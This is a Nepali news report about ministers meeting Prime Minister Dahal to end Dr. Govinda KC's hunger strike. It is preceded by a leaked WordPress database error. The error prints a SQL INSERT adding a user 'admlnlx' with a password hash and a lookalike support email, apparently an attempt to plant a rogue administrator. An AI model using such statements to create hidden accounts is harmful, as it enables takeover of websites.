WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BvFuvyUGErDeZPkCbE3j5A4r7isGeC1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 13:19:28', '', 'admlnlx', 'admlnlx')
काठमाडौ., मंसिर १६–
विभिन्न माग राख्दै आमरण अनसनरत डा. गोविन्द केसीको अनसन तोडाउने बारेमा प्रधानमन्त्री पुष्पकमल दाहालसंग स्वास्थ्य मन्त्री गगनकुमार थापा र शिक्षा मन्त्री धनिराम पौडेलले छलफल गर्नु भएको छ ।
सरकारी पक्ष र डा केसी पक्षकाबीचमा केहीदिनदेखि भईरहेको वार्ता निश्कर्षमा पुग्न नसकेपछि स्वास्थ्य मन्त्री थापाले निकास निकाल्नका लागि शिक्षा मन्त्री पौडेललाई लिएर प्रधानमन्त्री निवास बालुवाटार पुग्नु भएको मन्त्री थापाका प्रेस संयोजक जीवन भण्डारीले जानकारी दिनुभयो ।
छलफलका क्रममा स्वास्थ्य मन्त्री थापाले समाधानका उपायहरु बारे प्रधानमन्त्रीलाई अवगत गराउनु भएको र प्रधानमन्त्री दाहालले सोही अनुरुप निर्देशन दिने बताउनु भएको थियो ।
स्वास्थ्य मन्त्री थापाले प्रधानमन्त्रीलाई कुनैपनि हालतमा डा केसीको अनसन आज तोडाउनै पर्नेमा जोड दिनु भएको थियो ।
प्रधानन्त्रीसँगको भेटपछि स्वास्थ्य मन्त्री थापाले अहिले अन्य सरोकारवालाहरुसँग छलफल गरिरहनु भएको छ ।